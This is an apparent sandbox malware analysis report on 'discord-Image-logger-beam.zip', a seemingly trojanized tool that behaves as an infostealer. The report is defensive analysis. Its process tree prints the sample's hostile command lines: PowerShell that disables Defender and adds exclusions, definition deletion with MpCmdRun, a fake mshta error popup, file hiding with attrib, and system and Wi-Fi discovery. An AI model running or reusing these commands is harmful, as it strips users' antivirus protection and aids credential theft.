Analysis
-
max time kernel
67s -
max time network
69s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
20-11-2024 20:15
Static task
static1
Behavioral task
behavioral1
Sample
discord-Image-logger-beam.zip
Resource
win10ltsc2021-20241023-en
General
-
Target
discord-Image-logger-beam.zip
-
Size
31.6MB
-
MD5
06531f20be16e3f95af7a9dbb9121a75
-
SHA1
047bf62c3030b32f2c77169a77a833a42f0e1ddc
-
SHA256
b5b39a2eb7907ef041dd7ff25795319e92268b61b2f54edb8f42b7ace6a8f2bd
-
SHA512
f937c46a8e7eeda3aca565e87a95e5c8fac1c85d3a62d9cbdc21e3def6c9aa663732d3fd9618232c9d2cab0249a7168c5a57caea872d7b0a37cacfb2b98c79a6
-
SSDEEP
786432:Z4LAsr+IWGQ72rvzDrLqCsrg6iZhd81vUAAmsJ0YqRw:ZargGQ7KvnrLKrg68OZAmsJ0a
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 2 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exeMpCmdRun.exepid process 1684 MpCmdRun.exe 3160 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4740 powershell.exe 3060 powershell.exe 2160 powershell.exe 3052 powershell.exe 3956 powershell.exe 4984 powershell.exe 2676 powershell.exe 3060 powershell.exe 5600 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeSetup.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Setup.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 4 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Processes:
cmd.exepowershell.execmd.exepowershell.exepid process 3128 cmd.exe 1448 powershell.exe 2872 cmd.exe 3152 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
Setup.exeSetup.exerar.exepid process 3700 Setup.exe 1948 Setup.exe 3392 rar.exe -
Loads dropped DLL 34 IoCs
Processes:
Setup.exeSetup.exepid process 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 1948 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe 2676 Setup.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ip-api.com 33 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 10 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 6064 tasklist.exe 1744 tasklist.exe 1684 tasklist.exe 1092 tasklist.exe 4152 tasklist.exe 884 tasklist.exe 656 tasklist.exe 5348 tasklist.exe 644 tasklist.exe 3336 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI37002\python311.dll upx behavioral1/memory/1948-34-0x00007FFEC1510000-0x00007FFEC1AF9000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_ctypes.pyd upx behavioral1/memory/1948-38-0x00007FFEC14E0000-0x00007FFEC1503000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\libffi-8.dll upx behavioral1/memory/1948-41-0x00007FFED1F80000-0x00007FFED1F8F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_lzma.pyd upx behavioral1/memory/1948-49-0x00007FFEC14B0000-0x00007FFEC14DD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_sqlite3.pyd upx behavioral1/memory/1948-52-0x00007FFED1840000-0x00007FFED1859000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\sqlite3.dll upx behavioral1/memory/1948-58-0x00007FFEC1310000-0x00007FFEC1480000-memory.dmp upx behavioral1/memory/1948-56-0x00007FFEC1480000-0x00007FFEC14A3000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_socket.pyd upx behavioral1/memory/1948-61-0x00007FFEC12F0000-0x00007FFEC1309000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_ssl.pyd upx behavioral1/memory/1948-68-0x00007FFEC12C0000-0x00007FFEC12EE000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\libcrypto-1_1.dll upx behavioral1/memory/1948-75-0x00007FFEC0E80000-0x00007FFEC11F9000-memory.dmp upx behavioral1/memory/1948-77-0x00007FFEC14E0000-0x00007FFEC1503000-memory.dmp upx behavioral1/memory/1948-74-0x00007FFEC1200000-0x00007FFEC12B8000-memory.dmp upx behavioral1/memory/1948-73-0x00007FFEC1510000-0x00007FFEC1AF9000-memory.dmp upx behavioral1/memory/1948-64-0x00007FFED1AE0000-0x00007FFED1AED000-memory.dmp upx behavioral1/memory/1948-84-0x00007FFED18F0000-0x00007FFED18FD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\unicodedata.pyd upx behavioral1/memory/1948-88-0x00007FFEC0D40000-0x00007FFEC0E5C000-memory.dmp upx behavioral1/memory/1948-87-0x00007FFED1840000-0x00007FFED1859000-memory.dmp upx behavioral1/memory/1948-83-0x00007FFEC14B0000-0x00007FFEC14DD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_queue.pyd upx behavioral1/memory/1948-80-0x00007FFEC0E60000-0x00007FFEC0E74000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI37002\_hashlib.pyd upx behavioral1/memory/1948-109-0x00007FFEC1480000-0x00007FFEC14A3000-memory.dmp upx behavioral1/memory/1948-116-0x00007FFEC1310000-0x00007FFEC1480000-memory.dmp upx behavioral1/memory/1948-173-0x00007FFEC12F0000-0x00007FFEC1309000-memory.dmp upx behavioral1/memory/1948-221-0x00007FFED1AE0000-0x00007FFED1AED000-memory.dmp upx behavioral1/memory/1948-274-0x00007FFEC12C0000-0x00007FFEC12EE000-memory.dmp upx behavioral1/memory/1948-275-0x00007FFEC1200000-0x00007FFEC12B8000-memory.dmp upx behavioral1/memory/1948-276-0x00007FFEC0E80000-0x00007FFEC11F9000-memory.dmp upx behavioral1/memory/1948-293-0x00007FFEC0E60000-0x00007FFEC0E74000-memory.dmp upx behavioral1/memory/1948-309-0x00007FFEC0D40000-0x00007FFEC0E5C000-memory.dmp upx behavioral1/memory/1948-301-0x00007FFEC1310000-0x00007FFEC1480000-memory.dmp upx behavioral1/memory/1948-295-0x00007FFEC1510000-0x00007FFEC1AF9000-memory.dmp upx behavioral1/memory/1948-296-0x00007FFEC14E0000-0x00007FFEC1503000-memory.dmp upx behavioral1/memory/1948-356-0x00007FFED18F0000-0x00007FFED18FD000-memory.dmp upx behavioral1/memory/1948-358-0x00007FFEC14E0000-0x00007FFEC1503000-memory.dmp upx behavioral1/memory/1948-367-0x00007FFEC1200000-0x00007FFEC12B8000-memory.dmp upx behavioral1/memory/1948-366-0x00007FFEC12C0000-0x00007FFEC12EE000-memory.dmp upx behavioral1/memory/1948-365-0x00007FFED1AE0000-0x00007FFED1AED000-memory.dmp upx behavioral1/memory/1948-364-0x00007FFEC12F0000-0x00007FFEC1309000-memory.dmp upx behavioral1/memory/1948-363-0x00007FFEC1310000-0x00007FFEC1480000-memory.dmp upx behavioral1/memory/1948-362-0x00007FFEC1480000-0x00007FFEC14A3000-memory.dmp upx behavioral1/memory/1948-361-0x00007FFED1840000-0x00007FFED1859000-memory.dmp upx behavioral1/memory/1948-360-0x00007FFEC14B0000-0x00007FFEC14DD000-memory.dmp upx behavioral1/memory/1948-359-0x00007FFED1F80000-0x00007FFED1F8F000-memory.dmp upx behavioral1/memory/1948-354-0x00007FFEC0E80000-0x00007FFEC11F9000-memory.dmp upx behavioral1/memory/1948-357-0x00007FFEC0D40000-0x00007FFEC0E5C000-memory.dmp upx behavioral1/memory/1948-343-0x00007FFEC1510000-0x00007FFEC1AF9000-memory.dmp upx behavioral1/memory/1948-355-0x00007FFEC0E60000-0x00007FFEC0E74000-memory.dmp upx behavioral1/memory/2676-390-0x00007FFEC0DA0000-0x00007FFEC1389000-memory.dmp upx behavioral1/memory/2676-391-0x00007FFEC0D70000-0x00007FFEC0D93000-memory.dmp upx behavioral1/memory/2676-392-0x00007FFED1F80000-0x00007FFED1F8F000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
Processes:
TiWorker.exedescription ioc process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid process 4568 cmd.exe 2876 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
Processes:
cmd.exenetsh.execmd.exenetsh.exepid process 456 cmd.exe 3900 netsh.exe 1372 cmd.exe 5504 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 3684 WMIC.exe 2876 WMIC.exe 3844 WMIC.exe 2928 WMIC.exe 4324 WMIC.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 1908 systeminfo.exe 5484 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exeWMIC.exepowershell.exeWMIC.exepowershell.exetaskmgr.exepid process 3956 powershell.exe 3956 powershell.exe 4740 powershell.exe 4740 powershell.exe 3956 powershell.exe 4740 powershell.exe 3504 WMIC.exe 3504 WMIC.exe 3504 WMIC.exe 3504 WMIC.exe 4324 WMIC.exe 4324 WMIC.exe 4324 WMIC.exe 4324 WMIC.exe 3684 WMIC.exe 3684 WMIC.exe 3684 WMIC.exe 3684 WMIC.exe 3060 powershell.exe 3060 powershell.exe 3060 powershell.exe 2500 WMIC.exe 2500 WMIC.exe 2500 WMIC.exe 2500 WMIC.exe 1144 powershell.exe 1144 powershell.exe 1448 powershell.exe 1448 powershell.exe 1144 powershell.exe 1448 powershell.exe 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 4428 WMIC.exe 4428 WMIC.exe 4428 WMIC.exe 4428 WMIC.exe 644 WMIC.exe 644 WMIC.exe 644 WMIC.exe 644 WMIC.exe 884 WMIC.exe 884 WMIC.exe 884 WMIC.exe 884 WMIC.exe 884 WMIC.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 2876 WMIC.exe 2876 WMIC.exe 2876 WMIC.exe 2876 WMIC.exe 3824 powershell.exe 3824 powershell.exe 3824 powershell.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 1420 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeRestorePrivilege 1420 7zFM.exe Token: 35 1420 7zFM.exe Token: SeSecurityPrivilege 1420 7zFM.exe Token: SeDebugPrivilege 644 tasklist.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeIncreaseQuotaPrivilege 3504 WMIC.exe Token: SeSecurityPrivilege 3504 WMIC.exe Token: SeTakeOwnershipPrivilege 3504 WMIC.exe Token: SeLoadDriverPrivilege 3504 WMIC.exe Token: SeSystemProfilePrivilege 3504 WMIC.exe Token: SeSystemtimePrivilege 3504 WMIC.exe Token: SeProfSingleProcessPrivilege 3504 WMIC.exe Token: SeIncBasePriorityPrivilege 3504 WMIC.exe Token: SeCreatePagefilePrivilege 3504 WMIC.exe Token: SeBackupPrivilege 3504 WMIC.exe Token: SeRestorePrivilege 3504 WMIC.exe Token: SeShutdownPrivilege 3504 WMIC.exe Token: SeDebugPrivilege 3504 WMIC.exe Token: SeSystemEnvironmentPrivilege 3504 WMIC.exe Token: SeRemoteShutdownPrivilege 3504 WMIC.exe Token: SeUndockPrivilege 3504 WMIC.exe Token: SeManageVolumePrivilege 3504 WMIC.exe Token: 33 3504 WMIC.exe Token: 34 3504 WMIC.exe Token: 35 3504 WMIC.exe Token: 36 3504 WMIC.exe Token: SeIncreaseQuotaPrivilege 4740 powershell.exe Token: SeSecurityPrivilege 4740 powershell.exe Token: SeTakeOwnershipPrivilege 4740 powershell.exe Token: SeLoadDriverPrivilege 4740 powershell.exe Token: SeSystemProfilePrivilege 4740 powershell.exe Token: SeSystemtimePrivilege 4740 powershell.exe Token: SeProfSingleProcessPrivilege 4740 powershell.exe Token: SeIncBasePriorityPrivilege 4740 powershell.exe Token: SeCreatePagefilePrivilege 4740 powershell.exe Token: SeBackupPrivilege 4740 powershell.exe Token: SeRestorePrivilege 4740 powershell.exe Token: SeShutdownPrivilege 4740 powershell.exe Token: SeDebugPrivilege 4740 powershell.exe Token: SeSystemEnvironmentPrivilege 4740 powershell.exe Token: SeRemoteShutdownPrivilege 4740 powershell.exe Token: SeUndockPrivilege 4740 powershell.exe Token: SeManageVolumePrivilege 4740 powershell.exe Token: 33 4740 powershell.exe Token: 34 4740 powershell.exe Token: 35 4740 powershell.exe Token: 36 4740 powershell.exe Token: SeIncreaseQuotaPrivilege 3956 powershell.exe Token: SeSecurityPrivilege 3956 powershell.exe Token: SeTakeOwnershipPrivilege 3956 powershell.exe Token: SeLoadDriverPrivilege 3956 powershell.exe Token: SeSystemProfilePrivilege 3956 powershell.exe Token: SeSystemtimePrivilege 3956 powershell.exe Token: SeProfSingleProcessPrivilege 3956 powershell.exe Token: SeIncBasePriorityPrivilege 3956 powershell.exe Token: SeCreatePagefilePrivilege 3956 powershell.exe Token: SeBackupPrivilege 3956 powershell.exe Token: SeRestorePrivilege 3956 powershell.exe Token: SeShutdownPrivilege 3956 powershell.exe Token: SeDebugPrivilege 3956 powershell.exe Token: SeSystemEnvironmentPrivilege 3956 powershell.exe Token: SeRemoteShutdownPrivilege 3956 powershell.exe Token: SeUndockPrivilege 3956 powershell.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
Processes:
7zFM.exetaskmgr.exepid process 1420 7zFM.exe 1420 7zFM.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe -
Suspicious use of SendNotifyMessage 38 IoCs
Processes:
taskmgr.exepid process 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe 2500 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup.exeSetup.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3700 wrote to memory of 1948 3700 Setup.exe Setup.exe PID 3700 wrote to memory of 1948 3700 Setup.exe Setup.exe PID 1948 wrote to memory of 3724 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3724 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3712 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3712 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 1228 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 1228 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3264 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3264 1948 Setup.exe cmd.exe PID 3724 wrote to memory of 4740 3724 cmd.exe powershell.exe PID 3724 wrote to memory of 4740 3724 cmd.exe powershell.exe PID 1228 wrote to memory of 2584 1228 cmd.exe mshta.exe PID 1228 wrote to memory of 2584 1228 cmd.exe mshta.exe PID 3264 wrote to memory of 644 3264 cmd.exe tasklist.exe PID 3264 wrote to memory of 644 3264 cmd.exe tasklist.exe PID 3712 wrote to memory of 3956 3712 cmd.exe powershell.exe PID 3712 wrote to memory of 3956 3712 cmd.exe powershell.exe PID 1948 wrote to memory of 3392 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3392 1948 Setup.exe cmd.exe PID 3392 wrote to memory of 3504 3392 cmd.exe cmd.exe PID 3392 wrote to memory of 3504 3392 cmd.exe cmd.exe PID 1948 wrote to memory of 4792 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 4792 1948 Setup.exe Conhost.exe PID 4792 wrote to memory of 2100 4792 cmd.exe reg.exe PID 4792 wrote to memory of 2100 4792 cmd.exe reg.exe PID 1948 wrote to memory of 1080 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 1080 1948 Setup.exe cmd.exe PID 3712 wrote to memory of 1684 3712 cmd.exe MpCmdRun.exe PID 3712 wrote to memory of 1684 3712 cmd.exe MpCmdRun.exe PID 1080 wrote to memory of 2252 1080 cmd.exe tree.com PID 1080 wrote to memory of 2252 1080 cmd.exe tree.com PID 1948 wrote to memory of 4460 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 4460 1948 Setup.exe cmd.exe PID 4460 wrote to memory of 4324 4460 cmd.exe WMIC.exe PID 4460 wrote to memory of 4324 4460 cmd.exe WMIC.exe PID 1948 wrote to memory of 2052 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 2052 1948 Setup.exe cmd.exe PID 2052 wrote to memory of 3684 2052 cmd.exe Conhost.exe PID 2052 wrote to memory of 3684 2052 cmd.exe Conhost.exe PID 1948 wrote to memory of 520 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 520 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 752 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 752 1948 Setup.exe cmd.exe PID 520 wrote to memory of 2968 520 cmd.exe attrib.exe PID 520 wrote to memory of 2968 520 cmd.exe attrib.exe PID 752 wrote to memory of 3060 752 cmd.exe powershell.exe PID 752 wrote to memory of 3060 752 cmd.exe powershell.exe PID 1948 wrote to memory of 3392 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3392 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3504 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 3504 1948 Setup.exe cmd.exe PID 3504 wrote to memory of 1744 3504 cmd.exe tasklist.exe PID 3504 wrote to memory of 1744 3504 cmd.exe tasklist.exe PID 3392 wrote to memory of 3336 3392 cmd.exe tasklist.exe PID 3392 wrote to memory of 3336 3392 cmd.exe tasklist.exe PID 1948 wrote to memory of 3264 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 3264 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 3128 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 3128 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 2636 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 2636 1948 Setup.exe cmd.exe PID 1948 wrote to memory of 4792 1948 Setup.exe Conhost.exe PID 1948 wrote to memory of 4792 1948 Setup.exe Conhost.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4928 attrib.exe 5788 attrib.exe 5932 attrib.exe 2968 attrib.exe 4248 attrib.exe 2612 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\discord-Image-logger-beam.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1420
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1648
-
C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:1684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()"4⤵PID:2584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:2252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
